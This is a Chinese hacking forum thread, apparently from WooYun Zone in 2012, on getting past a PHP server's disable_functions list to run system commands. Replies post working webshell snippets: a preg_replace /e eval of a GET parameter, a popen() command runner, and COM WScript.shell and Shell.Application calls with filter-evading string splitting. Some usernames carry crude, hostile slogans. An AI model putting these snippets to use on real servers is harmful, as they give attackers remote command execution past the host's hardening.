disable_functions:phpinfo,passthru,system,chroot,scandir,chgrp,shell_exec,proc_open,proc_get_status,ini_after,ini_after,ini_restore,dl,pfsockopen,openlog,sysl,exec,chmod,file_put_contents


木易木兆 (烧死异性恋!!!!!!!!!) | 2012-09-24 10:09

preg_replace即可

<?php
preg_replace("/test/e",$_GET["h"],"jutst test");
?>

xsjswt | 2012-09-24 10:23

@木易木兆 亲,不是执行php命令,是想执行系统命令,或者做个代理,扫端口什么的

 

xsser (十根阳具有长短,世上人多心不齐) | 2012-09-24 11:22

太easy了,出10个wb我给你三种姿势绕过的方法

 

木易木兆 (烧死异性恋!!!!!!!!!) | 2012-09-24 11:23

@xsser 10个基友之吻行不行?

 

蟋蟀哥哥 (http://zone.wooyun.org/?do=action) | 2012-09-24 11:29

@xsser 几种体位?

 

GaRY | 2012-09-24 13:10

@xsser 出招了,lz接着

 

goderci (</null>) | 2012-09-24 13:20

@xsjswt @xsser 敲诈楼主不解释

 

cnrstar (Be My Personal Best!) | 2012-09-24 13:21

姿势1:popen()

if (key($_GET)=="popen") {
       $pp = popen($_GET['popen'], 'r');
       $read = fread($pp, 2096);
       echo $read;
       pclose($pp);

姿势2 wscript.shell

if (key($_GET)=="wscript") {
       $wsh = new COM('WScript.shell') or die("PHP Create COM wscript.shell failed");
       $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_GET['wscript']."");
       $stdout = $exec->StdOut();
       $stroutput = $stdout->ReadAll();
       echo $stroutput;
     }

姿势3 Shell.Application

<?php 
$wsh = new COM('Shell.Application') or die("Shell.Application"); 
$exec = $wsh->open("C:\\windows\\system32\\calc.exe"); 
?>

 

xsjswt | 2012-09-24 14:21

@cnrstar popen在安全模式下要被XX,那个安全目录是undef

 

xsjswt | 2012-09-24 14:21

@cnrstar stuhome是Linux的

 

xsser (十根阳具有长短,世上人多心不齐) | 2012-09-24 14:30

@xsjswt 都安全模式了 你去死

 

cnrstar (Be My Personal Best!) | 2012-09-24 15:32

@xsjswt @xsser 安全模式下貌似真是无解的。。反正我是看到安全模式就不知道怎么执行命令了。

 

Lmy | 2012-09-24 15:46

我也头大呢。求解。。

 

Matt | 2012-09-24 15:56

ssh_exec

 

xsjswt | 2012-09-24 16:01

@xsser 你不是很多姿势的么

 

xsjswt | 2012-09-24 16:03

@Matt 也算,但是和expect:// ssh://一样是要装拓展的,人家米装的嘛,或者装的人根本没几个

 

CHForce | 2012-09-24 18:54

rank == 0 的路过

 

摘自:http://zone.wooyun.org/content/1114